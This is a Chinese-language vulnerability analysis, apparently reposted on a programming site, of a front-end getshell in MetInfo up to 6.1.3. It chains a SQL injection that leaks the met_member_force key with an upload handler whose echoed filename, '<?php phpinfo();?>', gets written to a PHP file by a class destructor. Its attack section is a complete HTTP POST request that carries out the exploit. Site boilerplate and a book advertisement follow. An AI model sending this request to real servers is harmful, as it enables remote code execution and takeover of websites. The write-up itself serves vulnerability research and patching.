某info <= 6.1.3前台getshell

栏目: 数据库 · 发布时间: 5年前

内容简介:本漏洞需要结合前台SQL注入进行getshell。漏洞文件存在于

本漏洞需要结合前台 SQL 注入进行getshell。

漏洞分析

漏洞文件存在于 app/system/include/class/web.class.php 文件中,我们可以看到当满足条件: $_M['form']['metinfonow'] == $_M['config']['met_member_force'] 时, web 类的析构函数会将缓冲区的数据写入一个可控的文件中,其代码具体如下:

某info <= 6.1.3前台getshell

为了满足上面的条件,我们需要先看看 $_M['config']['met_member_force'] 是什么。通过搜索 met_member_force 关键字,我们可以发现其值的生成方式是通过 randStr 函数随机生成 7个 字符。具体代码如下:

某info <= 6.1.3前台getshell

针对 Metinfo6.x <= 6.1.2 的版本,我们可以利用已知的 SQL注入 漏洞(留言版处)获取 $_M['config']['met_member_force'] 的值,而 Metinfo6.1.3 的版本,也可以利用未修复的 SQL注入 漏洞(反馈处),具体漏洞细节可参考: Metinfo6.0.0-6.1.2前台注入漏洞生命线 。下图为通过注入获取 $_M['config']['met_member_force'] 的值:

某info <= 6.1.3前台getshell

接下来就是寻找 web 类的子类,因为他们都继承了父类的 __destruct 方法,我们只要找到可控制的缓冲区数据,便可完成整个攻击。通过全局搜索 extends web 关键字,我们发现有一个 uploadify 子类非常适合。该上传类不管上传操作成功与否,都会将相关信息输出(即可将数据送入缓冲区)。该类中有多个方法均可利用,我们随机选取一个 doupfile 方法来分析。

我们可以看到下图代码 第17行 直接将 $back 变量输出,我们跟进到 第15行 ,观察该变量值的来源。

某info <= 6.1.3前台getshell

从上图代码中,我们可以清晰的看到 $back 变量来源于可控的 $_M['form']['formname'] ,我们跟进对其处理的 upfile 类的 upload 方法,具体代码如下:

某info <= 6.1.3前台getshell

我们看到 第30行 代码,如果 $this->ext 类型不再数据库中,就将其返回,而如果我们将文件名设置为 <?php phpinfo();?> ,这样这段代码也会被输出到缓冲区中。接着回到我们文章开头的代码中,便可成功写入 shell

攻击

POST /metinfo/admin/index.php?c=uploadify&m=include&a=doupfile⟨=cn&metinfonow=qipwtxm&html_filename=1.php HTTP/1.1
Host: localhost
Content-Length: 196
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename="<?php phpinfo();?>"
Content-Type: image/jpeg

test
------WebKitFormBoundary8tQiXReYsQYXHadW--

某info <= 6.1.3前台getshell

攻击流程图

最后我们再来理一下整个攻击的流程:

某info <= 6.1.3前台getshell

参考

【技术分析】Metinfo利用sql注入快速getshell


以上所述就是小编给大家介绍的《某info <= 6.1.3前台getshell》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

在线

在线

王坚 / 中信出版集团 / 2018-5-21 / 59.00元

50多万年前的关键词是光明与黑暗, 50多年前的关键词是数字和模拟, 而今天的关键词是在线与离线。 移动互联网是比传统互联网在线程度更深的互联网。对于真正成熟的互联网来说,手机只是诸多的在线设备之一,慢慢地,每一个设备都会变成互联网的终端。 真正的竞争力,是把所有人都可能拥有的东西变成财富,让沙子变成硅。大家都把大数据当作金矿,想要掘金。但在王坚看来,大数据的厉害之处是把沙......一起来看看 《在线》 这本书的介绍吧!

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具